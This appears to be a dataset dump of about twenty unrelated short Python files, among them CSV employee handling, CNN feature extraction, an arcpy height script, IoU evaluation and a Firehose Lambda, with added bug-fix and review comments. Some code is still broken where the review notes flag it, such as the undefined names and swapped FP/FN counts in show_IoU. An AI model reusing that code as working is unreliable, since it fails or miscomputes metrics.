            # BUG FIX: isdigit was referenced without calling it, so the
            # (always truthy) bound method disabled phone validation.
            if employee[2].isdigit() and len(employee[2]) == 10:
                phone = employee[2]
            else:
                print("Invalid phone number for UID {0}- phone must consist of 10 digits".format(uid))
                break
            # Discriminating people over 120 years :)
            # BUG FIX: same missing call on isdigit for the birth year.
            if employee[3].isdigit():
                age = datetime.date.today().year - int(employee[3])
                if age > 120:
                    print("{0} is {1} years old and still an employee?! Fool me again...".format(name, age))
            else:
                print("Invalid age for UID {0}".format(uid))
                break
            new_emp = Employee(uid, name, phone, age)
            new_emp.add_employee()
# TODO: This function uses constants from the beginning of this file. Reconsider this design decision
def delete_emp(uid):
    """Remove every row whose first column equals *uid* from the employees
    file, by rewriting it through a temp file and swapping it into place.
    """
    # (Removed an older commented-out in-memory implementation of the same
    # rewrite.)
    with open(employees_csv, 'r') as employees_read, open(employees_temp, 'w', newline='') as employees_write:
        writer = csv.writer(employees_write)
        for row in csv.reader(employees_read):
            if row[0] != uid:
                writer.writerow(row)
    # Replace the original file with the filtered copy.
    if os.path.exists(employees_csv) and os.path.exists(employees_temp):
        os.remove(employees_csv)
        os.rename(employees_temp, employees_csv)
    else:
        print("File doesn't exist")
def delete_from_file(path):
    """Delete every employee whose UID appears in the CSV file at *path*."""
    with open(path, 'r') as to_delete:
        for record in csv.reader(to_delete):
            # Only rows whose first column is numeric are treated as UIDs.
            if record[0].isdigit():
                delete_emp(record[0])
def validate(details):
    """Validate an employee record [uid, name, phone, birth_year].

    Returns True when valid, otherwise a human-readable error string.
    """
    if len(details) != 4:
        return "You are to supply 4 fields"
    if not details[0].isdigit():
        return "The UID must be numeric"
    if not details[1].isalpha():
        return "Employee name must not contain numbers"
    # BUG FIX: isdigit was not called and the condition used 'and', so the
    # (always truthy) bound method meant a bad phone was never reported.
    if not (details[2].isdigit() and len(details[2]) == 10):
        return "Phone number must contain 10 digits"
    # BUG FIX: isdigit was not called here either.
    if not details[3].isdigit():
        return "Birth year must be numeric"
    age = datetime.date.today().year - int(details[3])
    if age > 120:
        # BUG FIX: the placeholders were never filled in.
        return "{0} is {1} years old? Unbelievable!".format(details[1], age)
    return True
# Checks if an employee exists in the employees file (with all of its data)
def exists(employee_row):
    """Return True when *employee_row* exactly matches a row in the file."""
    with open(employees_csv, 'r') as employee_read:
        reader = csv.reader(employee_read)
        return any(row == employee_row for row in reader)
|
# -*- coding: utf-8 -*-
import os
from urllib.parse import urlparse
from scrapy.pipelines.files import FilesPipeline
class GithubPipeline(FilesPipeline):
    """Names downloaded files '<item name>-<url basename>'."""

    def file_path(self, request, response=None, info=None, *, item=None):
        # e.g. item 'proj' + url .../v1.0.tar.gz -> 'proj-v1.0.tar.gz'
        suffix = os.path.basename(urlparse(request.url).path)
        return '{}-{}'.format(item['name'], suffix)
|
import torch
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
from torchvision import models, transforms
from torch.utils.data import DataLoader
from torchvision.datasets import ImageFolder
import numpy as np
from sklearn import preprocessing
from tqdm import tqdm
import struct
from collections import defaultdict
import os
import sys
# Preprocessing: resize so the short side is 480, convert to tensor, and
# normalize with the standard ImageNet channel statistics.
img_transform = transforms.Compose([
    transforms.Resize(480),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
# Output directory for extracted training features.
train_feature_path = "train_feature"
# NOTE(review): the dataset locations below are placeholder paths -- fill
# in before running (this module builds the loaders at import time).
train_path = "/path/to/landmark_clean"
train_data = ImageFolder(train_path, transform=img_transform)
train_dataloader = DataLoader(dataset=train_data, shuffle=False, num_workers=4, batch_size=1)
# Evaluation sets ('oxf'/'par'): image directory + feature output directory.
test_dataset = {
    'oxf': {
        'img_path': '/path/to/images',
        'feature_path': '/path/to/feature',
    },
    'par':{
        'img_path': '/path/to/images',
        'feature_path': '/path/to/feature',
    }
}
test_data_oxf = ImageFolder(test_dataset['oxf']['img_path'], transform=img_transform)
test_dataloader_oxf = DataLoader(dataset=test_data_oxf, shuffle=False, num_workers=4, batch_size=1)
test_data_par = ImageFolder(test_dataset['par']['img_path'], transform=img_transform)
test_dataloader_par = DataLoader(dataset=test_data_par, shuffle=False, num_workers=4, batch_size=1)
# Loaders keyed the same way as test_dataset.
test_dataloader = {
    'oxf': test_dataloader_oxf,
    'par': test_dataloader_par,
}
class AlexNetFeature(nn.Module):
    """Pretrained AlexNet conv trunk + global max pooling, L2-normalized."""

    def __init__(self):
        super(AlexNetFeature, self).__init__()
        backbone = models.alexnet(pretrained=True)
        # First 12 layers of alexnet.features, then a 1x1 adaptive max pool.
        trunk = [backbone.features[i] for i in range(12)]
        self.feature = nn.Sequential(*trunk)
        self.feature.add_module('12: Global Pooling', nn.AdaptiveMaxPool2d(1))

    def forward(self, I):
        # Pool, flatten to (batch, channels), then L2-normalize each row.
        pooled = self.feature(I)
        flat = pooled.view(pooled.size(0), -1)
        return F.normalize(flat, p=2, dim=1)
class VGGNetFeature(nn.Module):
    """Pretrained VGG19 conv trunk + global max pooling, L2-normalized."""

    def __init__(self):
        super(VGGNetFeature, self).__init__()
        backbone = models.vgg19(pretrained=True)
        # First 36 layers of vgg.features, then a 1x1 adaptive max pool.
        trunk = [backbone.features[i] for i in range(36)]
        self.feature = nn.Sequential(*trunk)
        self.feature.add_module('36: GlobalPooling', nn.AdaptiveMaxPool2d(1))

    def forward(self, I):
        # Pool, flatten to (batch, channels), then L2-normalize each row.
        pooled = self.feature(I)
        flat = pooled.view(pooled.size(0), -1)
        return F.normalize(flat, p=2, dim=1)
class ResNetFeature(nn.Module):
    """Pretrained ResNet50 trunk (minus avgpool/fc) + global max pooling."""

    def __init__(self):
        super(ResNetFeature, self).__init__()
        backbone = models.resnet50(pretrained=True)
        # All children except the final avgpool and fc layers.
        trunk = list(backbone.children())[:-2]
        self.feature = nn.Sequential(*trunk)
        self.feature.add_module('8: Global Pooling', nn.AdaptiveMaxPool2d(1))

    def forward(self, I):
        # Pool, flatten to (batch, channels), then L2-normalize each row.
        pooled = self.feature(I)
        flat = pooled.view(pooled.size(0), -1)
        return F.normalize(flat, p=2, dim=1)
def extractFeature(model, data_loader, feature_path, write_flag=False, suffix='.f.npy'):
    '''
    write feature to .npy file or return feature matrix.

    When write_flag is truthy, each image's feature is saved under
    feature_path/<class label>/<counter><suffix> and nothing is returned;
    otherwise all features are concatenated and returned as a numpy array.
    Requires CUDA (the model and inputs are moved to the GPU).
    '''
    model.cuda()
    model.eval()
    if write_flag:
        cnt = 0
        for img, label in data_loader:
            img = Variable(img).cuda()
            feature = model(img)
            class_path = os.path.join(feature_path, str(int(label)))
            if not os.path.exists(class_path):
                os.makedirs(class_path)
            save_dir = os.path.join(class_path, str(cnt) + suffix)
            # BUG FIX: 'print save_dir' was Python 2 syntax -- a
            # SyntaxError under Python 3.
            print(save_dir)
            np.save(save_dir, feature.cpu().data.numpy())
            cnt += 1
    else:
        feature_map = torch.FloatTensor()
        for img, _ in tqdm(data_loader):
            img = Variable(img).cuda()
            feature = model(img)
            feature_map = torch.cat((feature_map, feature.cpu().data), 0)
        feature_map = feature_map.numpy()
        return feature_map
def proceeRMACfeature(img_path, src_path, dest_path):
    '''
    vgg16_rmac is a 1024-d vector, composed of 512-d max-pooling feature and 512-d rmac feature.

    Reads each image's '<name>.vgg16_rmac' binary file from src_path, keeps
    the 512-d rmac half, L2-normalizes it, and saves it under
    dest_path/<folder>/<counter>.frmac.npy.
    '''
    folders = os.listdir(img_path)
    folders.sort()
    cnt = 0
    for folder in folders:
        folder_path = os.path.join(img_path, folder)
        images = os.listdir(folder_path)
        images.sort()
        for img in images:
            src_feature = os.path.join(src_path, img+'.vgg16_rmac')
            if not os.path.exists(src_feature):
                continue
            # BUG FIX: 'print src_feature' was Python 2 syntax -- a
            # SyntaxError under Python 3.
            print(src_feature)
            # Two consecutive 512-float blocks: max-pool part, then rmac.
            with open(src_feature, 'rb') as fr:
                feat_dim = 512
                f_max = struct.unpack('f'*feat_dim, fr.read(4*feat_dim))
                f_rmac = struct.unpack('f'*feat_dim, fr.read(4*feat_dim))
            f_rmac = np.array(f_rmac)
            f_rmac = f_rmac.reshape(1, -1)
            f_rmac = preprocessing.normalize(f_rmac, norm='l2', axis=1)
            feature_folder = os.path.join(dest_path, folder)
            if not os.path.exists(feature_folder):
                os.makedirs(feature_folder)
            dest_feature = os.path.join(feature_folder, str(cnt) + '.frmac.npy')
            np.save(dest_feature, f_rmac)
            cnt += 1
    # BUG FIX: Python 2 print statement -> print() call.
    print("number of features:", cnt)
if __name__ == "__main__":
    # Extract AlexNet features for both evaluation sets and write them to
    # each set's feature_path as .npy files.
    model, suffix = AlexNetFeature(), '.f.npy'
    for building, building_dataloader in test_dataloader.items():
        extractFeature(model, building_dataloader, test_dataset[building]['feature_path'], True, suffix)
'''
Created on Mar 5, 2015
@author: fan
'''
import unittest
class RefTests(unittest.TestCase):
    """Demonstrations of Python reference/identity semantics; each test
    prints its observations rather than asserting."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_def_var(self):
        # Reading an undefined name raises NameError.
        try:
            print(var)
        except Exception as ex:
            # except: <class 'NameError'> global name 'var' is not defined
            print("except:", type(ex), ex)

    def test_assign(self):
        # Rebinding a name vs mutating a list shared by two names.
        x = 4
        print("x = 4", x)
        x = 5
        print("x = 5", x)
        l1 = [1, 2, 3]
        l2 = l1
        print("l1", l1)
        print("l2", l2)
        l1[0] = 99
        print("l1[0] = 99")
        print("l1", l1)
        print("l2", l2)

    def test_null_boolean(self):
        # None is falsy in a boolean context.
        var = None
        if (var):
            print(var, "is taken as boolean true")
        else:
            print(var, "is taken as boolean false")

    def test_equality(self):
        # '==' compares values; 'is' compares object identity. CPython may
        # intern small ints and some strings, so 'is' results can vary.
        l1 = [1, 2, 3]
        l2 = [1, 2, 3]
        print("l1", l1, "\n", "l2", l2)
        print("l1 == l2", l1 == l2)
        print("l1 is l2", l1 is l2)
        print()
        l3 = l1
        print("l1", l1, "\n", "l3", l3)
        print("l1 == l3", l1 == l3)
        print("l1 is l3", l1 is l3)
        print()
        x = 2
        y = 2
        print("x=%d" % x, "y=%d" % y)
        print("x==y is %d" % (x == y))
        print("(x is y) is %d" % (x is y))
        print()
        x = "abc"
        y = "abc"
        print("x=%s" % x, "y=%s" % y)
        print("x==y is %d" % (x == y))
        print("(x is y) is %d" % (x is y))
        print()
        x = "012345678911234567892123456789"
        y = "012345678911234567892123456789"
        print("x=%s" % x, "y=%s" % y)
        print("x==y is %d" % (x == y))
        print("(x is y) is %d" % (x is y))

    def test_copy(self):
        # Shallow copies compare equal but are distinct objects.
        l1 = [1, 2, 3]
        l2 = l1[:]
        print("l1", l1, "\n", "l2", l2)
        print("l1 == l2", l1 == l2)
        print("l1 is l2", l1 is l2)
        ad = {1: 'a', 2: 'b', 3: 'c'}
        bd = ad.copy()
        print("ad", ad, "\n", "bd", bd)
        print("ad == bd", ad == bd)
        # BUG FIX: the original printed 'l1 is l2' here (copy-paste error);
        # the dict identity check was intended.
        print("ad is bd", ad is bd)
if __name__ == "__main__":
    # import sys;sys.argv = ['', 'Test.testName']
    # Discover and run all tests in this module.
    unittest.main()
|
#!/Users/test/Documents/Dice-app-ios/AutoDelarWebsite_Django/env/bin/python
# Thin wrapper around Django's command-line utility (equivalent to the
# generated django-admin script): forwards sys.argv to Django.
from django.core import management
if __name__ == "__main__":
    management.execute_from_command_line()
|
from .Dog import Dog
def start():
    # Print a simple startup banner.
    print("starting...")
def addDoggy(name, tricks):
    """Create a Dog called *name*, teach it every trick in *tricks*,
    print the resulting trick list, and return the instance."""
    dog = Dog(name)
    for trick in tricks:
        dog.add_trick(trick)
    print(dog.tricks)
    return dog
|
# -*- coding: utf-8 -*-
'''函数形参和实参测试:定义一个函数,实现两个数比较,并返回较大的值'''
#定义函数
def printMax(a, b):
    """Print the larger of the two values a and b.

    The two arguments must be mutually comparable (same type), otherwise
    the comparison raises. When they are equal, b is printed.
    """
    larger = a if a > b else b
    print(larger)
# Call the function
printMax(10, 9)  # actual arguments 10, 9
# Actual arguments must match the formal parameters one-to-one:
#printMax(10,20,21)
'''Docstrings (function documentation)

Readability matters most. By convention, the start of a function body
carries a documentation string describing what the function does, written
with triple single or double quotes and possibly spanning multiple lines.
The docstring is available as the function's __doc__ attribute.
'''
# BUG FIX: help(printMax.__doc__) passed the docstring *text* to help(),
# which looks that text up as a help topic instead of showing the
# function's documentation; pass the function object itself.
help(printMax)
# Name: Taidgh Murray
# Student ID: 15315901
# File: bar.py
############################################################################
import math
num=input("Please enter a sequence of numbers, seperated by commas: ")
li=num.split(",")
numlist=[float(i) for i in li]
maximum=max(numlist)
# NOTE(review): N is computed but never used -- presumably intended for
# scaling the bars; confirm.
N=math.log10(maximum)
# BUG FIX: numlist.index(v) returns the FIRST occurrence of the value, so
# duplicate values printed the wrong row number; enumerate tracks the true
# position.
for pos, v in enumerate(numlist, start=1):
    r=abs(math.ceil(v/2))  # one '#' per 2 units
    print(pos,":",r*'#',"(",r,")",sep="")
print("""
   |--------------------------------------------------|
   0                                                  100
   """)
|
from kivy.app import App
from custom_camera.custom_camera import CameraWidget, CustomCamera
from kivy.base import Builder
# Load the kv layout used by CameraWidget before any widget is built.
Builder.load_file("custom_camera/custom_camera.kv")
class TestCamera(App):
    """Minimal app whose root widget is a single CameraWidget."""
    def build(self):
        # The returned widget becomes the app's root widget.
        camera = CameraWidget()
        return camera
TestCamera().run()
|
from neo.io.basefromrawio import BaseFromRaw
from neo.rawio.elanrawio import ElanRawIO
class ElanIO(ElanRawIO, BaseFromRaw):
    """
    Class for reading data from Elan.
    Elan is software for studying time-frequency maps of EEG data.
    Elan is developed in Lyon, France, at INSERM U821
    https://elan.lyon.inserm.fr
    """
    # 'split-all' -- presumably each channel gets its own signal group
    # (vs grouping channels sharing units); confirm against neo docs.
    _prefered_signal_group_mode = 'split-all'
    # _prefered_signal_group_mode = 'group-by-same-units'
    def __init__(self, filename):
        # Initialize both bases explicitly (cooperative multiple
        # inheritance is not used here).
        ElanRawIO.__init__(self, filename=filename)
        BaseFromRaw.__init__(self, filename)
|
import arcpy
arcpy.env.overwriteOutput = True
inputFeatureclass = arcpy.GetParameterAsText(0)  # rec_sites.shp
fileheight = arcpy.GetParameterAsText(1)         # raster with height values
newFiles = arcpy.GetParameterAsText(2)           # resultFile = "#"
newFields = arcpy.GetParameterAsText(3)          # newFields = '#'
if newFields == '#' or not newFields:
    newFields = 'HEIGHT'
# Changes occur in the input, or a new file is created -- the user decides.
if newFiles == "#" or not newFiles:
    newFiles = inputFeatureclass
    arcpy.AddMessage("Changes occured in the input file")
else:
    arcpy.CopyFeatures_management(inputFeatureclass, newFiles)
    arcpy.AddMessage("A new file has been created with changes")
# Check coordinate systems for coincidence.
if arcpy.Describe(newFiles).spatialReference.name == arcpy.Describe(fileheight).spatialReference.name:
    arcpy.AddMessage("Coordinate systems coincide")
else:
    # NOTE(review): Project_management is given the same dataset as input
    # and output; it normally requires a distinct output path -- confirm.
    projection = arcpy.Describe(fileheight).spatialReference.name  # typo fix: was 'projectnion'
    arcpy.Project_management(newFiles, newFiles, projection)
    arcpy.AddMessage("The coordinate systems did not match. Reprojected")
# Determine the height value at each feature's coordinates.
height = []
# BUG FIX: the original line was 'arcpy.da.SearchCursornewFiles, ...' --
# the opening parenthesis was missing, a SyntaxError.
with arcpy.da.SearchCursor(newFiles, 'SHAPE@XY') as cursor:
    for row in cursor:
        evel = arcpy.GetCellValue_management(fileheight, str(row[0][0])+' '+str(row[0][1]))
        height.append(evel.getOutput(0))
arcpy.AddMessage("The values of heights by coordinates are determined")
# Create the new field and write the sampled heights into it.
arcpy.AddField_management(newFiles, newFields, "SHORT")
with arcpy.da.UpdateCursor(newFiles, newFields) as cursor:
    i = 0
    for row in cursor:
        row[0] = height[i]
        cursor.updateRow(row)
        i += 1
arcpy.AddMessage("Created {} field and height data is recorded".format(newFields))
|
# Create Font Art using Python
# The PyFiglet library in Python can be used to visualize the output of your Python program with an amazing font style.
# Step:1
# pip install pyfiglet
import pyfiglet
# Render the text as ASCII art using pyfiglet's default font.
font = pyfiglet.figlet_format('Nidhi Gupta')
print(font)
|
# Task: Implement find
#X v1: find <starting dir>
#X v2: find <starting dir> -name "*.txt"
#X v3: find <starting dir> -type d
import argparse
import glob
import os
class Cmd(object):
    """A tiny 'find' clone: find <starting dir> [-name PATTERN] [-type d|f]."""

    def __init__(self):
        # Parse sys.argv once; results are kept on the instance.
        parser = argparse.ArgumentParser()
        parser.add_argument("dir",
                            help="The starting directory", nargs='?',
                            type=str)
        parser.add_argument("-name", help="Filter by name", type=str)
        parser.add_argument("-type", help="Filter by type", type=str)
        self._top_level_args = parser.parse_args()

    def find(self):
        """Print every path under the starting directory that matches the
        -name pattern (if any) and the -type filter (if any)."""
        path = self._top_level_args.dir if self._top_level_args.dir else '.'
        path += '/**'  # Modify path to search in subdirectories
        if self._top_level_args.name:
            path += '/%s' % self._top_level_args.name
        for name in glob.iglob(path, recursive=True):
            if self._top_level_args.type == 'd' and not os.path.isdir(name):
                continue
            # GENERALIZATION: also support find's '-type f' (regular
            # files), complementing the existing '-type d'.
            if self._top_level_args.type == 'f' and not os.path.isfile(name):
                continue
            print(name)
if __name__ == '__main__':
    # Parse argv and run the search.
    Cmd().find()
|
import os
import re
import glob
import cv2
import pickle
import matplotlib as plt
import numpy as np
from PIL import Image
from mlc.function import show
from keras import backend as K
np.set_printoptions(threshold=400000000)
def show_IoU():
    """
    Compute IoU / recall / precision / F-measure between predicted masks
    and ground-truth labels, per image, print them, and append them to a
    value.txt file.

    (Original note: the label directory must contain .jpg files only.)

    NOTE(review): `root`, `filename` and `dataname` used when writing
    value.txt below are not defined anywhere in this function or module as
    shown -- reaching that line raises NameError; confirm where they
    should come from.
    """
    datapath = "./image/precision/"
    filepath = "epicenter_center"
    # Collect the ground-truth label files.
    label_path = (datapath+filepath + "/label/*jpg").replace('\n', '')
    files = glob.glob(label_path)
    image_path = (datapath+filepath + "/image/*png").replace('\n', '')
    fimage = glob.glob(image_path)
    # File names only (used to pair predictions with labels by position).
    pred = os.listdir(datapath+filepath + "/label")
    # Iterate over the prediction file names.
    for j, n in enumerate(pred):
        # Build the matching prediction path.
        fpred = ("./unet_result/pred/"+n).replace('\n', '')
        #for file in files:
        flabel = files[j]
        #print(fpred)
        #print(fimage[j])
        #print(flabel)
        # NOTE(review): stray debug pause -- blocks on every iteration.
        input()
        pred = cv2.imread(fpred,0)  # NOTE(review): rebinds the list 'pred' being iterated (safe with enumerate, but confusing)
        image = cv2.imread(fimage[j],0)
        label = cv2.imread(flabel,0)
        # show(pred)
        # show(image)
        # show(label)
        #os.system('cls')
        # Binarize label and prediction before comparing.
        # NOTE(review): shape is unpacked as (w, h) but numpy returns
        # (rows, cols); the loops below index [y, x] with y in range(w) --
        # only correct for square images; confirm.
        w,h = pred.shape
        label[label >240] = 0
        label[label > 0] = 255
        pred[pred > 250] = 255
        pred[pred <= 250] = 0
        pred_s = np.copy(pred)/255
        label_s = np.copy(label)/255
        """
        plabel : predicted label (edited result image)
        val    : val image (predicted mask image)
        label  : acc label (ground-truth mask image)
        - ground-truth colors
          red   0,0,255
          blue  255,0,0
          green 0,255,0
        """
        # NOTE(review): FP counts label-positive/pred-negative pixels and
        # FN the reverse -- swapped relative to the usual definitions, so
        # 'recall' and 'precision' below are swapped too (IoU unaffected).
        TP,FP,FN = 0,0,0
        for x in range(h):
            for y in range(w):
                # Ground-truth positive pixel
                if label[y,x] == 255:
                    if pred[y,x] == 255:
                        TP +=1
                # Detection result:
                # missed detection
                if label[y,x] == 255 and pred[y,x] == 0:
                    FP += 1
                # false detection
                if label[y,x] == 0 and pred[y,x] == 255:
                    FN += 1
        IOU = TP / (TP + FP+ FN)
        recall = TP / (TP + FN)
        precision = TP / (TP + FP)
        F_value = TP/(TP+(FP+FN)/2)
        with open(root +"/value.txt",mode='a') as f_dataset:
            f_dataset.write("dataname :"+filename + dataname)
            f_dataset.write("\n IOU :"+str(IOU))
            f_dataset.write("\n recall :"+str(recall))
            f_dataset.write("\n precision:"+str(precision))
            f_dataset.write("\n F_value :"+str(F_value))
            f_dataset.write("\n----------------------------------------------------------------------\n")
        print("\nIOU = ",IOU)
        print("\nrecall = ",recall)
        print("\nprecision = ",precision)
        print("\nF_value = ",F_value)
if __name__ == "__main__":
    # Run the IoU evaluation over the configured directories.
    show_IoU()
    #movie_to_image(10,videopath)
|
#
# Expected YAML contents: a mapping of test ids to parameter lists, e.g.
# datas = [1,2,3],[0.2,0.3,0.4]
# myids = ['整数',"浮点数"]
import yaml
# Load the parameter sets once at import time.
with open('datas/test/a.yml') as f:
    datas = yaml.safe_load(f)
# Keys become the test ids; values become the parameter sets.
myids = datas.keys()
mydatas = datas.values()
def test_param(param):
    # Print the parameter injected for this generated test case.
    print(f"param= {param}")
    print("动态生成测试用例")
|
from board import Board
from ai import AI
from human import Human
human = Human()
AI = AI()
gameboard = Board()
currPlayer = human
print(gameboard)
# Main loop: runs until gameOver() reports a result.
while(gameboard.gameOver() == None):
    # BUG FIX: the original 'type(currPlayer is Human)' evaluated
    # type(<bool>), which is always truthy; isinstance is the intended
    # check.
    if isinstance(currPlayer, Human):
        print("It is the Human's turn.\n")
        #gameboard.printBoard()
        moves = gameboard.getValidMoves()
        print(moves)
        # Re-prompt until the input is an int that is a valid move
        # (moves.index raises ValueError otherwise).
        while True:
            try:
                col = int(input("Please choose a column: "))
                moves.index(col)
                break
            except ValueError:
                print ("Not a valid move, try again.")
        currPlayer.makeMove(gameboard, col)
        print(gameboard)
        #currPlayer = AI
    else :
        #gameboard.printBoard()
        #currPlayer.makeMove
        currPlayer = human
#gameboard.printBoard()
# Unpack the result flags: both set -> AI win, x only -> human win,
# neither -> draw.
(x, y) = gameboard.gameOver()
if (x & y):
    print("AI wins!")
elif (x):
    print("Human wins!")
else:
    print("Draw!")
print("Works!")
from musket_core import image_datasets,datasets
# Dataset providers registered with musket_core.
# NOTE(review): the four segmentation providers below are identical --
# presumably placeholders to be specialized (per fold/class); confirm.
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment1():
    return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment2():
    return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment3():
    return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment4():
    return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
# Multi-class classification provider keyed by ImageId -> ClassId.
@datasets.dataset_provider(origin="classify.csv",kind="MultiClassificationDataset")
def get_classify():
    return image_datasets.MultiClassClassificationDataSet(["test_images","train_images"],"classify.csv","ImageId","ClassId")
|
def main():
    """Collect purchased items interactively and print an invoice table
    followed by the grand total."""
    item_names = []
    item_prices = []
    item_counts = []
    grandtotal = 0
    print ("This program will help to calculate the customer's invoice.\n")
    item_name = input ("Enter the name of the first item purchased.")
    while (len(item_name) > 0):
        item_names.append(item_name)
        item_counts.append(int(input ("How many " + item_name + " were purchased? ")))
        item_prices.append(float(input ("What was the price for each " + item_name + "? ")))
        item_name = input("\nEnter the name of the next item purchased. (Press enter when done.)")
    print ("\n\n%-30s%10s%12s%10s" % ("Item Name", "Cost Each", "Quantity", "Total"))
    for i in range (0, len(item_names)):
        itemName = item_names[i]
        itemCount = item_counts[i]
        itemPrice = item_prices[i]
        itemTotal = itemCount * itemPrice
        # BUG FIX: price and quantity were printed in swapped columns
        # (quantity under 'Cost Each', and the float price truncated by %d).
        print ("%-30s%10.2f%12d%10.2f" % (itemName, itemPrice, itemCount, itemTotal))
        # BUG FIX: grandtotal was never accumulated, so it always printed 0.
        grandtotal += itemTotal
    # Grand total and exit
    print ("\n\tGrand Total: $%.2f" % (grandtotal))
# Run the interactive invoice program.
main()
class Car:
    """Demo car with class-level defaults and per-instance state.

    GENERALIZATION: __init__ accepts an optional 'name', so callers no
    longer have to assign car.name externally before calling stopDist()
    or park() (which read self.name). Existing Car(milage, age) calls
    still work.
    """

    # Class attributes shared by all cars
    wheel_type ="Firestone"
    make="Mercedes"
    year_of_manufacture=2016

    #Runs as soon as you create an Object
    def __init__(self, milage, age, name=None):
        # (typo fix in message: 'constructore' -> 'constructor')
        print(" I am the constructor method")
        self.milage = milage
        self.miaka = age  # 'miaka' is Swahili for years/age
        self.name = name

    def stopDist(self):
        print("{} stopping distance is 30M".format(self.name))

    def park(self):
        print("{} is currently parking".format(self.name))
# car1= Car()
#car1.name="X6"
# car1.stopDist()
# car2=Car()
# car2.name="Telsa CyberTruck"
# car2.park()
# Demo: create a car, attach a name afterwards, and inspect its state.
car3=Car(123,6)
car3.name="Jane"
print(car3.milage)
print(car3.miaka)
print(car3.name)
"""
Student Class
con method:
method :
1.to find total marks- totalMarks()
2.Find the avg core- averageScore()
3.grade the student-gradeStudent()
"""
|
import base64
import json
import logging
import time
logger = logging.getLogger()
logger.setLevel(logging.INFO)

def lambda_handler(event, context):
    """Kinesis Firehose transform: decode each record's base64 JSON, keep
    only First_Name and Last_Name, re-encode, and return the records; any
    failing record is passed back unchanged marked 'ProcessingFailed'.

    BUG FIX: 'output' was a module-level list, so records accumulated
    across warm Lambda invocations (the module persists between calls);
    it is now local to each invocation.
    """
    output = []
    for record in event['records']:
        try:
            # Input data is base64 encoded, need to decode it
            decodedData = base64.b64decode(record['data'].encode('utf-8'))
            originalData = json.loads(decodedData.decode('utf-8'))
            # Enrich data: keep only the name fields
            enrichedOutput = {
                'First_Name': originalData['First_Name'],
                'Last_Name': originalData['Last_Name']
            }
            # Prepare output payload (Firehose expects base64)
            outputData = base64.b64encode(json.dumps(enrichedOutput).encode('utf-8')).decode('utf-8')
            # Object back to firehose
            output_record = {
                'recordId': record['recordId'],
                'result': 'Ok',
                'data': outputData
            }
            logger.info("Success")
        except Exception as e:
            logger.error('Exception: ' + str(e))
            # Processing failed: return the original payload untouched
            output_record = {
                'recordId': record['recordId'],
                'result': 'ProcessingFailed',
                'data': record['data']
            }
        output.append(output_record)
    return {'records': output}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.